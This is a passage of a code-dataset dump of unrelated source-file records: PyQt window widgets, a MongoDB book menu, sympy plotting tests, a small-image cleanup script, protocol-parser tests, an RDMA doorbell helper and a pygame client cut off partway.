self._MaximumButton.setObjectName(\"MinMaxButton\")\n # 设置按钮的ObjectName以在qss样式表内定义不同的按钮样式\n self._MaximumButton.setToolTip(\"最大化\")\n self._MaximumButton.setMouseTracking(True)\n # 设置按钮鼠标跟踪(如不设,则按钮在widget上层,无法实现跟踪)\n self._MaximumButton.setFixedHeight(self._TitleLabel.height())\n # 设置按钮高度为标题栏高度\n self._MaximumButton.clicked.connect(self._changeNormalButton)\n # 按钮信号连接切换到恢复窗口大小按钮函数\n\n def change_windows(self):\n if self._MaximumButton.toolTip() == \"最大化\":\n self._changeNormalButton()\n else:\n self._changeMaxButton()\n\n def _changeNormalButton(self):\n # 切换到恢复窗口大小按钮\n try:\n self.showMaximized()\n # 先实现窗口最大化\n self._MaximumButton.setText(b'\\xef\\x80\\xb2'.decode(\"utf-8\"))\n # 更改按钮文本\n self._MaximumButton.setToolTip(\"恢复\")\n # 更改按钮提示\n self._MaximumButton.disconnect()\n # 断开原本的信号槽连接\n self._MaximumButton.clicked.connect(self._changeMaxButton)\n # 重新连接信号和槽\n except:\n pass\n\n def _changeMaxButton(self):\n # 切换到最大化按钮\n try:\n self.showNormal()\n self._MaximumButton.setText(b'\\xef\\x80\\xb1'.decode(\"utf-8\"))\n self._MaximumButton.setToolTip(\"最大化\")\n self._MaximumButton.disconnect()\n self._MaximumButton.clicked.connect(self._changeNormalButton)\n except:\n 
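# the min/max buttons may not have been created yet; ignore the error\n 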
pass\n\n def resizeEvent(self, QResizeEvent):\n # 自定义窗口调整大小事件\n self._TitleLabel.setFixedWidth(self.width())\n self.content_widget.setFixedWidth(self.width()-4)\n self.content_widget.setFixedHeight(self.height()-35)\n # 将标题标签始终设为窗口宽度\n # 分别移动三个按钮到正确的位置\n try:\n self._CloseButton.move(self.width() - self._CloseButton.width(), 0)\n except:\n pass\n try:\n self._MinimumButton.move(self.width() - (self._CloseButton.width() + 1) * 3 + 1, 0)\n except:\n pass\n try:\n self._MaximumButton.move(self.width() - (self._CloseButton.width() + 1) * 2 + 1, 0)\n except:\n pass\n # 重新调整边界范围以备实现鼠标拖放缩放窗口大小,采用三个列表生成式生成三个列表\n self._right_rect = [QPoint(x, y) for x in range(self.width() - self._padding, self.width() + 1)\n for y in range(1, self.height() - self._padding)]\n self._bottom_rect = [QPoint(x, y) for x in range(1, self.width() - self._padding)\n for y in range(self.height() - self._padding, self.height() + 1)]\n self._corner_rect = [QPoint(x, y) for x in range(self.width() - self._padding, self.width() + 1)\n for y in range(self.height() - self._padding, self.height() + 1)]\n\n def mousePressEvent(self, event):\n # 重写鼠标点击的事件\n if (event.button() == Qt.LeftButton) and (event.pos() in self._corner_rect):\n # 鼠标左键点击右下角边界区域\n self._corner_drag = True\n event.accept()\n elif (event.button() == Qt.LeftButton) and (event.pos() in self._right_rect):\n # 鼠标左键点击右侧边界区域\n self._right_drag = True\n event.accept()\n elif (event.button() == Qt.LeftButton) and (event.pos() in self._bottom_rect):\n # 鼠标左键点击下侧边界区域\n self._bottom_drag = True\n event.accept()\n elif (event.button() == Qt.LeftButton) and (event.y() < self._TitleLabel.height()):\n # 鼠标左键点击标题栏区域\n self._move_drag = True\n self.move_DragPosition = event.globalPos() - self.pos()\n event.accept()\n\n def mouseMoveEvent(self, QMouseEvent):\n # 判断鼠标位置切换鼠标手势\n if QMouseEvent.pos() in self._corner_rect:\n self.setCursor(Qt.SizeFDiagCursor)\n elif QMouseEvent.pos() in self._bottom_rect:\n self.setCursor(Qt.SizeVerCursor)\n elif QMouseEvent.pos() in self._right_rect:\n self.setCursor(Qt.SizeHorCursor)\n else:\n self.setCursor(Qt.ArrowCursor)\n # 当鼠标左键点击不放及满足点击区域的要求后,分别实现不同的窗口调整\n # 没有定义左方和上方相关的5个方向,主要是因为实现起来不难,但是效果很差,拖放的时候窗口闪烁,再研究研究是否有更好的实现\n if Qt.LeftButton and self._right_drag:\n # 右侧调整窗口宽度\n self.resize(QMouseEvent.pos().x(), self.height())\n QMouseEvent.accept()\n elif Qt.LeftButton and self._bottom_drag:\n # 下侧调整窗口高度\n self.resize(self.width(), QMouseEvent.pos().y())\n QMouseEvent.accept()\n elif Qt.LeftButton and self._corner_drag:\n # 右下角同时调整高度和宽度\n self.resize(QMouseEvent.pos().x(), QMouseEvent.pos().y())\n QMouseEvent.accept()\n elif Qt.LeftButton and self._move_drag:\n # 标题栏拖放窗口位置\n self.move(QMouseEvent.globalPos() - self.move_DragPosition)\n QMouseEvent.accept()\n\n def mouseReleaseEvent(self, QMouseEvent):\n # 鼠标释放后,各扳机复位\n self._move_drag = False\n self._corner_drag = False\n self._bottom_drag = False\n self._right_drag = False\n\n\nclass VideoSlider(QSlider):\n\n set_position_value = pyqtSignal(int)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setFocusPolicy(Qt.NoFocus)\n self.setMouseTracking(True)\n\n self.setStyleSheet(\" \\\n QSlider::add-page:Horizontal\\\n { \\\n background-color: rgb(87, 97, 106);\\\n height:4px;\\\n }\\\n QSlider::sub-page:Horizontal \\\n {\\\n background-color:qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(231,80,229, 255), stop:1 rgba(7,208,255, 255));\\\n height:4px;\\\n }\\\n QSlider::groove:Horizontal \\\n {\\\n background:transparent;\\\n height:6px;\\\n }\\\n 
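/* the draggable handle thumb */\\\n 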
QSlider::handle:Horizontal \\\n {\\\n height: 30px;\\\n width:8px;\\\n border-image: url(:/images/ic_music_thumb.png);\\\n margin: -8 0px; \\\n }\\\n \")\n\n def mousePressEvent(self, QMouseEvent):\n if QMouseEvent.button() == Qt.LeftButton:\n if self.orientation() == Qt.Vertical:\n self.set_position_value.emit(self.minimum() + ((self.maximum() - self.minimum()) * (self.height() - QMouseEvent.y())) / self.height())\n else:\n self.set_position_value.emit(self.minimum() + ((self.maximum() - self.minimum()) * QMouseEvent.x()) / self.width())\n return super().mousePressEvent(QMouseEvent)\n\n def keyPressEvent(self, *args, **kwargs):\n return super().keyPressEvent(*args, **kwargs)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"other_widget/common_widget.py","file_name":"common_widget.py","file_ext":"py","file_size_in_byte":15122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186587542","text":"from mongodb.livro import Livro\nfrom mongodb.conexao import MongoConnect\n\n\n\ndef novo_livro():\n lista = []\n\n condicao = True\n\n while condicao:\n livro_titulo = str(input(\"Informe o titulo do livro: \"))\n livro_autor = str(input(\"Informe o autor do livro: \"))\n livro_publicacao = int(input(\"Informe o ano de publicacao: \"))\n\n novo_livro = Livro(livro_titulo, livro_autor, livro_publicacao)\n\n lista.append(novo_livro)\n\n resposta = str(input(\"Caso deseje inserir um novo livro, digite: 's', caso não deseje digite: 'n' >> \"))\n if resposta == 'n':\n condicao = False\n\n for livro in lista:\n livro.save()\n\n\n# novo_livro()\n\n\n\ndef mostra():\n conexao = MongoConnect()\n conexao.find()\n\n\n\n\ndef menu():\n op = None\n while True:\n op = str(\n input(\"Se deseja cadastrar um novo livro digite: 'l', se deseja visualizar os livro ja cadastrados \"\n \"digite 'v', ou 's' para sair: \"))\n if op == 'l':\n novo_livro()\n elif op == 'v':\n mostra()\n elif op == 's':\n break\n else:\n print(\"Escolha uma das opcoes validas\")\n\nmenu()","sub_path":"mongodb/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"368304727","text":"from sympy import (\n symbols,\n cos,\n sin,\n log,\n Eq,\n I,\n Abs,\n exp,\n pi,\n gamma,\n Matrix,\n Tuple,\n sqrt,\n Plane,\n)\nfrom sympy.geometry import (\n Plane,\n Polygon,\n Circle,\n Ellipse,\n Line,\n Segment,\n Ray,\n Line3D,\n Curve,\n Point2D,\n Point3D,\n Line3D,\n Segment3D,\n Ray3D,\n)\nfrom sympy.vector import CoordSys3D\nfrom pytest import raises\nfrom spb.plot_data import _build_series\nfrom spb.series import (\n LineOver1DRangeSeries,\n Parametric2DLineSeries,\n Parametric3DLineSeries,\n ParametricSurfaceSeries,\n SurfaceOver2DRangeSeries,\n InteractiveSeries,\n ImplicitSeries,\n Vector2DSeries,\n Vector3DSeries,\n ComplexSeries,\n ComplexInteractiveSeries,\n SliceVector3DSeries,\n GeometrySeries,\n PlaneSeries,\n PlaneInteractiveSeries,\n)\n\nimport numpy as np\n\n\ndef test_build_series():\n x, y, u, v = symbols(\"x, y, u, v\")\n\n # test automatic algorithm\n\n s = _build_series(cos(x), (x, -5, 5))\n assert isinstance(s, LineOver1DRangeSeries)\n\n s = _build_series((cos(x), sin(x)), (x, -5, 5))\n assert isinstance(s, Parametric2DLineSeries)\n\n s = _build_series(cos(x), sin(x), (x, -5, 5))\n assert isinstance(s, Parametric2DLineSeries)\n\n s = _build_series(cos(x), sin(x), x, (x, -5, 5))\n assert isinstance(s, Parametric3DLineSeries)\n\n s = 
_build_series(cos(x + y), (x, -5, 5))\n assert isinstance(s, SurfaceOver2DRangeSeries)\n\n s = _build_series(cos(x + y), sin(x + y), x, (x, -5, 5))\n assert isinstance(s, ParametricSurfaceSeries)\n\n s = _build_series((cos(x + y), sin(x + y), x), (x, -5, 5), (y, -2, 2))\n assert isinstance(s, ParametricSurfaceSeries)\n\n s = _build_series(u * cos(x), (x, -5, 5), params={u: 1})\n assert isinstance(s, InteractiveSeries)\n\n s = _build_series(Eq(x ** 2 + y ** 2, 5), (x, -5, 5), (y, -2, 2))\n assert isinstance(s, ImplicitSeries)\n\n s = _build_series(Eq(x ** 2 + y ** 2, 5) & (x > y), (x, -5, 5), (y, -2, 2))\n assert isinstance(s, ImplicitSeries)\n\n # test mapping\n s = _build_series(cos(x), (x, -5, 5), pt=\"p\")\n assert isinstance(s, LineOver1DRangeSeries)\n\n s = _build_series(cos(x), sin(x), (x, -5, 5), pt=\"pp\")\n assert isinstance(s, Parametric2DLineSeries)\n\n s = _build_series(cos(x), sin(x), x, (x, -5, 5), pt=\"p3dl\")\n assert isinstance(s, Parametric3DLineSeries)\n\n s = _build_series(cos(x + y), (x, -5, 5), (y, -3, 3), pt=\"p3d\")\n assert isinstance(s, SurfaceOver2DRangeSeries)\n\n # one missing range\n s = _build_series(cos(x + y), (x, -5, 5), pt=\"p3d\")\n assert isinstance(s, SurfaceOver2DRangeSeries)\n\n s = _build_series(cos(x + y), sin(x + y), x, (x, -5, 5), (y, -3, 3), pt=\"p3ds\")\n assert isinstance(s, ParametricSurfaceSeries)\n\n # missing ranges\n s = _build_series(cos(x + y), sin(x + y), x, pt=\"p3ds\")\n assert isinstance(s, ParametricSurfaceSeries)\n\n s = _build_series(u * cos(x), (x, -5, 5), params={u: 1}, pt=\"pinter\")\n assert isinstance(s, InteractiveSeries)\n\n s = _build_series(\n u * sqrt(x), (x, -5, 5), params={u: 1}, pt=\"pinter\", is_complex=True\n )\n assert isinstance(s, ComplexInteractiveSeries)\n\n\ndef test_geometry():\n def do_test(*g, s=GeometrySeries, **kwargs):\n s1 = _build_series(*g, pt=\"g\", **kwargs)\n assert isinstance(s1, s)\n # since the range could be None, it is imperative to test that label\n # receives the correct value.\n assert s1.label == str(g[0])\n s2 = _build_series(*g, **kwargs)\n assert isinstance(s2, s)\n assert s2.label == str(g[0])\n assert np.array_equal(s1.get_data(), s2.get_data(), equal_nan=True)\n\n x, y, z = symbols(\"x, y, z\")\n do_test(Point2D(1, 2))\n do_test(Point3D(1, 2, 3))\n do_test(Ray((1, 2), (3, 4)))\n do_test(Segment((1, 2), (3, 4)))\n do_test(Line((1, 2), (3, 4)), (x, -5, 5))\n do_test(Ray3D((1, 2, 3), (3, 4, 5)))\n do_test(Segment3D((1, 2, 3), (3, 4, 5)))\n do_test(Line3D((1, 2, 3), (3, 4, 5)))\n do_test(Polygon((1, 2), 3, n=10))\n do_test(Circle((1, 2), 3))\n do_test(Ellipse((1, 2), hradius=3, vradius=2))\n do_test(\n Plane((0, 0, 0), (1, 1, 1)), (x, -5, 5), (y, -4, 4), (z, -3, 3), s=PlaneSeries\n )\n\n # Interactive series. 
Note that GeometryInteractiveSeries is an instance of\n # GeometrySeries\n do_test(Point2D(x, y), params={x: 1, y: 2})\n do_test(\n Plane((x, y, z), (1, 1, 1)),\n (x, -5, 5),\n (y, -4, 4),\n (z, -3, 3),\n params={x: 1, y: 2, z: 3},\n s=PlaneInteractiveSeries,\n )\n\n\ndef test_vectors():\n x, y, z = symbols(\"x:z\")\n N = CoordSys3D(\"N\")\n v1 = x * N.i + y * N.j\n v2 = z * N.i + x * N.j + y * N.k\n m1 = v1.to_matrix(N)\n m2 = v2.to_matrix(N)\n l1 = list(m1)\n # I need a 2D vector: delete the last component, which is zero\n l1 = l1[:-1]\n l2 = list(m2)\n\n # 2D vectors\n s = _build_series(v1, (x, -10, 10), (y, -5, 5))\n assert isinstance(s, Vector2DSeries)\n s = _build_series(m1, (x, -10, 10), (y, -5, 5))\n assert isinstance(s, Vector2DSeries)\n s = _build_series(l1, (x, -10, 10), (y, -5, 5))\n assert isinstance(s, Vector2DSeries)\n s = _build_series(v1, (x, -10, 10), (y, -5, 5), pt=\"v2d\")\n assert isinstance(s, Vector2DSeries)\n s = _build_series(m1, (x, -10, 10), (y, -5, 5), pt=\"v2d\")\n assert isinstance(s, Vector2DSeries)\n s = _build_series(l1, (x, -10, 10), (y, -5, 5), pt=\"v2d\")\n assert isinstance(s, Vector2DSeries)\n\n s = _build_series(v2, (x, -10, 10), (y, -5, 5), (z, -8, 8))\n assert isinstance(s, Vector3DSeries)\n s = _build_series(m2, (x, -10, 10), (y, -5, 5), (z, -8, 8))\n assert isinstance(s, Vector3DSeries)\n s = _build_series(l2, (x, -10, 10), (y, -5, 5), (z, -8, 8))\n assert isinstance(s, Vector3DSeries)\n s = _build_series(v2, (x, -10, 10), (y, -5, 5), (z, -8, 8), pt=\"v3d\")\n assert isinstance(s, Vector3DSeries)\n s = _build_series(m2, (x, -10, 10), (y, -5, 5), (z, -8, 8), pt=\"v3d\")\n assert isinstance(s, Vector3DSeries)\n s = _build_series(l2, (x, -10, 10), (y, -5, 5), (z, -8, 8), pt=\"v3d\")\n assert isinstance(s, Vector3DSeries)\n s = _build_series(\n l2, (x, -10, 10), (y, -5, 5), (z, -8, 8), slice=Plane((-2, 0, 0), (1, 0, 0))\n )\n assert isinstance(s, SliceVector3DSeries)\n\n\ndef test_complex():\n x, y, z = symbols(\"x:z\")\n e1 = 1 + exp(-Abs(x)) * sin(I * sin(5 * x))\n\n def do_test_1(s, n):\n assert isinstance(s, ComplexSeries)\n data = s.get_data()\n assert len(data) == n\n return data\n\n def test_equal_results(data1, data2):\n for i, (d1, d2) in enumerate(zip(data1, data2)):\n print(\"i = {}\".format(i))\n assert np.array_equal(d1, d2)\n\n ### Complex line plots: use adaptive=False in order to compare results.\n\n # return x, mag(e1), arg(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, absarg=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, absarg=True, pt=\"c\")\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n\n # return x, real(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, real=True)\n data1 = do_test_1(s1, 2)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, real=True, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n xx, real = data1\n\n # return x, imag(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, imag=True)\n data1 = do_test_1(s1, 2)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, imag=True, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n _, imag = data1\n\n # return x, real(e1), imag(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, real=True, imag=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, real=True, imag=True, pt=\"c\")\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n test_equal_results(data1, (xx, real, imag))\n\n # return x, abs(e1)\n 
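# (abs=True asks the series for only the magnitude of the complex values)\n 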
s1 = _build_series(e1, (x, -5, 5), adaptive=False, abs=True)\n data1 = do_test_1(s1, 2)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, abs=True, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n xx, _abs = data1\n\n # return x, arg(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, arg=True)\n data1 = do_test_1(s1, 2)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, arg=True, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n _, arg = data1\n\n # return x, abs(e1), arg(e1)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, absarg=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, absarg=True, pt=\"c\")\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n test_equal_results(data1, (xx, _abs, arg))\n\n # return x, e1 (complex numbers)\n s1 = _build_series(e1, (x, -5, 5), adaptive=False, real=False, imag=False)\n data1 = do_test_1(s1, 2)\n test_equal_results((data1[0],), (xx,))\n assert any(isinstance(d, complex) for d in data1[1].flatten())\n s2 = _build_series(e1, (x, -5, 5), adaptive=False, real=False, imag=False, pt=\"c\")\n data2 = do_test_1(s2, 2)\n test_equal_results(data1, data2)\n\n ### Lists of complex numbers: returns real, imag\n e2 = z * exp(2 * pi * I * z)\n l2 = [e2.subs(z, t / 20) for t in range(20)]\n s = _build_series(l2)\n do_test_1(s, 2)\n\n ### Domain coloring: returns x, y, (mag, arg), ...\n s1 = _build_series(gamma(z), (z, -3 - 3 * I, 3 + 3 * I))\n data1 = do_test_1(s1, 5)\n s2 = _build_series(gamma(z), (z, -3 - 3 * I, 3 + 3 * I), pt=\"c\")\n data2 = do_test_1(s2, 5)\n test_equal_results(data1, data2)\n xx, yy, mag_arg, _, _ = data1\n mag, arg = mag_arg[:, :, 0], mag_arg[:, :, 1]\n\n ### 3D real part\n s1 = _build_series(gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, real=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(\n gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, real=True, pt=\"c\"\n )\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n xx, yy, real = data1\n\n ### 3D imaginary part\n s1 = _build_series(gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, imag=True)\n data1 = do_test_1(s1, 3)\n s2 = _build_series(\n gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, imag=True, pt=\"c\"\n )\n data2 = do_test_1(s2, 3)\n test_equal_results(data1, data2)\n _, _, imag = data1\n\n ### 3D real and imaginary parts\n s1 = _build_series(\n gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, real=True, imag=True\n )\n data1 = do_test_1(s1, 4)\n s2 = _build_series(\n gamma(z), (z, -3 - 3 * I, 3 + 3 * I), threed=True, real=True, imag=True, pt=\"c\"\n )\n data2 = do_test_1(s2, 4)\n test_equal_results(data1, data2)\n _, _, real2, imag2 = data1\n test_equal_results((real, imag), (real2, imag2))\n","sub_path":"tests/test_plot_data.py","file_name":"test_plot_data.py","file_ext":"py","file_size_in_byte":10927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142272487","text":"'''\nRemove all small images\n\nToo bad for training\n'''\nimport os\nimport glob\n\nPATH = \"dataset\"\n\nexp = PATH+\"/*/*.jpg\"\n\nthesh = 10990 + 10\n\nfor path in glob.glob(exp):\n if os.path.getsize(path) < thesh:\n os.remove(path)\n print(\"Removed {}\".format(path))","sub_path":"src/folder_actions/remove_small.py","file_name":"remove_small.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"367708599","text":"def 
search_reverse(list_, k):\n i = len(list_) - 1\n\n while i >= 0:\n if list_[i] < k:\n return None\n if list_[i] == k:\n return i\n i -= 1\n return None\n\n\ndef search_(list_, k):\n for i in range(len(list_)):\n if list_[i] > k:\n return None\n if list_[i] == k:\n return i\n return None\n\n\n# Search an element in a sorted and rotated array\ndef run(list_, el):\n if list_[0] <= el: # <= so that el equal to the first element is found by the forward scan\n print(search_(list_, el))\n else:\n print(search_reverse(list_, el))\n\n\nif __name__ == '__main__':\n run([15, 17, 18, 19, 20, 21, 3, 8, 9, 10, 11], 11)","sub_path":"src/find_sorted_rotated_array.py","file_name":"find_sorted_rotated_array.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"540394305","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# coding=utf-8\n\n\nimport os\nimport pickle\nimport re\nimport unittest\n\nfrom analyser.contract_agents import ORG_LEVELS_re\nfrom analyser.contract_patterns import ContractPatternFactory\nfrom analyser.legal_docs import LegalDocument\nfrom analyser.ml_tools import SemanticTag\nfrom analyser.parsing import AuditContext\nfrom analyser.persistence import DbJsonDoc\nfrom analyser.protocol_parser import find_protocol_org, find_org_structural_level, protocol_votes_re, ProtocolDocument\nfrom analyser.runner import Runner\nfrom analyser.structures import OrgStructuralLevel\nfrom tests.test_utilits import load_json_sample\n\n\nclass TestProtocolParser(unittest.TestCase):\n\n def test_read_json(self):\n data = load_json_sample('protocol_1.json')\n print(data['parse'])\n\n def test_protocol_processor(self):\n json_doc = load_json_sample('protocol_1.json')\n jdoc = DbJsonDoc(json_doc)\n legal_doc = jdoc.asLegalDoc()\n\n # print (doc)\n\n pp = Runner.get_instance().protocol_parser\n # pp.find_org_date_number(legal_doc, AuditContext())\n legal_doc:ProtocolDocument = pp.find_attributes(legal_doc, AuditContext())\n\n orgtags = legal_doc.org_tags\n for t in orgtags:\n print(t)\n\n def tag_val(name):\n tag = SemanticTag.find_by_kind(orgtags, name)\n if tag is not None:\n return tag.value\n\n self.assertEqual('Газпромнефть Шиппинг', tag_val('org-1-name'))\n self.assertEqual('Общество с ограниченной ответственностью', tag_val('org-1-type'))\n\n def get_doc(self, fn) -> (LegalDocument, ContractPatternFactory):\n pth = os.path.dirname(__file__)\n with open(os.path.join(pth, fn), 'rb') as handle:\n doc = pickle.load(handle)\n\n self.assertEqual(1024, doc.embeddings.shape[-1])\n\n return doc\n\n def test_load_pickle(self):\n doc = self.get_doc('Протокол_СД_ 3.docx.pickle')\n doc: LegalDocument = doc\n for p in doc.paragraphs:\n print('😱 \\t', doc.get_tag_text(p.header).strip(), '📂')\n\n def test_find_protocol_org_1(self):\n suff = ' ' * 1000\n\n txt = '''Протокол № 3/2019 Проведения итогов заочного голосования Совета директоров Общества с ограниченной ответственностью «Технологический центр «Бажен» (далее – ООО «Технологический центр «Бажен») г. 
Санкт-Петербург Дата составления протокола «__» _______ 2019 года\n Дата окончания приема бюллетеней для голосования членов Совета директоров «___»__________ 2019 года.\n ''' + suff\n doc = ProtocolDocument(LegalDocument(txt))\n doc.parse()\n tags = find_protocol_org(doc)\n self.assertEqual('Технологический центр «Бажен»', tags[0].value)\n self.assertEqual('Общество с ограниченной ответственностью', tags[1].value)\n\n def test_find_protocol_org_2(self):\n doc = self.get_doc('Протокол_СД_ 3.docx.pickle')\n doc.parse()\n print(doc[0:200].text)\n tags = find_protocol_org(doc)\n self.assertEqual('Технологический центр «Бажен»', tags[0].value)\n self.assertEqual('Общество с ограниченной ответственностью', tags[1].value)\n\n def test_ORG_LEVELS_re(self):\n suff = ' ' * 300\n t = '''\n ПРОТОКОЛ\nзаседания Совета директоров ООО «Газпромнефть- Корпоративные продажи» (далее – ООО «Газпромнефть- Корпоративные продажи» или «Общество»)\nМесто проведения заседания:\u0007\n''' + suff\n r = re.compile(ORG_LEVELS_re, re.MULTILINE | re.IGNORECASE | re.UNICODE)\n x = r.search(t)\n self.assertEqual('Совета директоров', x['org_structural_level'])\n\n def test_find_org_structural_level(self):\n t = '''\n ПРОТОКОЛ \\\n заседания Совета директоров ООО «Газпромнефть - Внеземная Любофьи» (далее – ООО «Газпромнефть-ВНЛ» или «Общество»)\\\n Место проведения заседания:\u0007\n ''' + ' ' * 900\n doc = LegalDocument(t)\n doc.parse()\n\n tags = list(find_org_structural_level(doc))\n self.assertEqual(OrgStructuralLevel.BoardOfDirectors.name, tags[0].value)\n\n def test_find_org_structural_level_2(self):\n t = '''\n ПРОТОКОЛ ночного заседания Правления общества ООО «Газпромнефть - Внеземная Любофь» (далее – ООО «Газпромнефть- ВНЛ» или «Общество»)\\\n Место проведения заседания:\u0007\n ''' + ' ' * 900\n doc = LegalDocument(t)\n doc.parse()\n\n tags = list(find_org_structural_level(doc))\n self.assertEqual(OrgStructuralLevel.BoardOfCompany.name, tags[0].value)\n\n def test_find_protocol_votes(self):\n doc = self.get_doc('Протокол_СД_ 3.docx.pickle')\n x = protocol_votes_re.search(doc.text)\n\n # for f in x:\n print(doc.text[x.span()[0]:x.span()[1]])\n\n def test_find_protocol_votes_re(self):\n t = '''\nПредварительно утвердить годовой отчет Общества за 2017 год.\nИтоги голосования:\n «ЗА» 8;\n«ПРОТИВ» нет;\n«ВОЗДЕРЖАЛСЯ» нет.\nРЕШЕНИЕ ПРИНЯТО.\nРешение, принятое по первому вопросу повестки дня:\nПредварительно утвердить годовой отчет Общества за 2017 год.'''\n\n doc = LegalDocument(t)\n doc.parse()\n\n x = protocol_votes_re.search(doc.text)\n\n match = doc.text[x.span()[0]:x.span()[1]]\n print(f'[{match}]')\n\n\nunittest.main(argv=['-e utf-8'], verbosity=3, exit=False)\n","sub_path":"tests/test_protocol_parser.py","file_name":"test_protocol_parser.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"393309238","text":"import math\nprint(\"Metodo de Newton\")\nprint(\"###############################\")\nprint(\"Qual a aproximacao inicial X0 e a precisao e?\")\n\nx0 = float(input(\"Entre com x0:\"))\ne = float(input(\"Entre com e:\"))\ni=0\ncd=8 #numero de casa decimais para arredondamento de Wx\n\ndef funcao(x):\n fx = (2*x)-math.sin(x)-4\n return fx\n\ndef funcao_d1(x):\n fx = 2-math.cos(x)\n return fx\n\ndef funcao_d2(x):\n fx = math.sin(x)\n return fx\n\ndef Wx(x): # Funcao de interacao\n ## X[i+1] = X[i]-f[x(i)]/f[x(i)]\n Wx = x - (funcao(x)/funcao_d1(x))\n print(\"[X_i:%d] Fx: %.5f | F'X: %.5f\"% (x, funcao(x), 
funcao_d1(x)))\n return Wx\n\n#Fazendo as iteracoes\nwhile True:\n i+=1\n x = Wx(x0)\n print(\"[%d] x_i: %.5f | x_i+1: %.5f | erro: %.3f | tolerancia:%.3f \"% (i, x0, x, abs(x-x0), e))\n if abs(x-x0)> 2) & 0x3\n if upd_hi == 1:\n index = self.ring.queue.qstate.get_cindex(ring_id)\n elif upd_hi == 2:\n index = self.ring.queue.qstate.get_pindex(ring_id)\n else:\n index = 0\n #lgh.info(\"UPD: %d Hi: %d, Lo: %d, Index: %d\" % (upd, upd_hi, upd_lo, index))\n\n pid = getattr(test_spec, 'pid', 0)\n\n address = 0x400000 + (upd << 17) + (lif_id << 6) + (queue_type << 3)\n data = (pid << 48) | (queue_id << 24) | (ring_id << 16) | index\n\n lgh.info(\"Ringing Doorbell: %s\" % self.GID())\n lgh.info(\"- Addr:0x%x (Qtype:%d/LIF:%d/Upd:%d)\" %\n (address, queue_type, lif_id, upd))\n lgh.info(\"- Data:0x%x (Pindex:%d/RingID:%d/QID:%d/PID:%d)\" %\n (data, index, ring_id, queue_id, pid))\n\n model_wrap.step_doorbell(address, data)\n","sub_path":"dol/iris/config/objects/rdma/doorbell.py","file_name":"doorbell.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407759348","text":"import socket\nimport pygame\nimport msgpack\nimport random\nimport time\n\n\nWIDTH = 800\nHEIGHT = 800\n\nclass ClientPlayer:\n\tdef __init__(self, name=\"unknown\", start_x=0.0, start_y=0.0):\n\t\tself.x = start_x\n\t\tself.y = start_y\n\t\tself.name = name\n\t\tself.size = 15\n\t\tself.speed = 1.0\n\t\tself.color = (255, 255, 255)\n\t\tself.angle_d = 0\n\t\tself.keys_down = []\n\n\t\tself.surface = None\n\t\tself.render_self()\n\n\tdef render_self(self):\n\t\tself.surface = pygame.Surface((int(self.size * 4), int(self.size * 4)))\n\t\tpygame.draw.circle(self.surface, self.color, \n\t\t\t(int(self.surface.get_width() / 2), \n\t\t\t\tint(self.surface.get_height() / 2)), \n\t\t\tint(self.size))\n\t\tpygame.draw.rect(self.surface, self.color, \n\t\t\t(int((self.surface.get_width() / 2) - self.size / 4), \n\t\t\t\tint((self.surface.get_height() / 2) ), \n\t\t\t\tint(self.size / 2), \n\t\t\t\tint(self.size * 1.5)))\n\n\tdef load_dict(self, variables):\n\t\tself.x = variables['x']\n\t\tself.y = variables['y']\n\t\tself.name = variables['name']\n\t\tself.size = variables['size']\n\t\tself.color = variables['color']\n\t\tself.angle_d = variables['angle_d']\n\t\tself.keys_down = variables['keys_down']\n\n\t\tself.render_self()\n\n\tdef render(self, surface):\n\t\ttemp_surface = pygame.transform.rotate(self.surface, self.angle_d)\n\t\tsurface.blit(temp_surface, (int(self.x - temp_surface.get_width() / 2), int(self.y - temp_surface.get_height() / 2)))\n\ndef 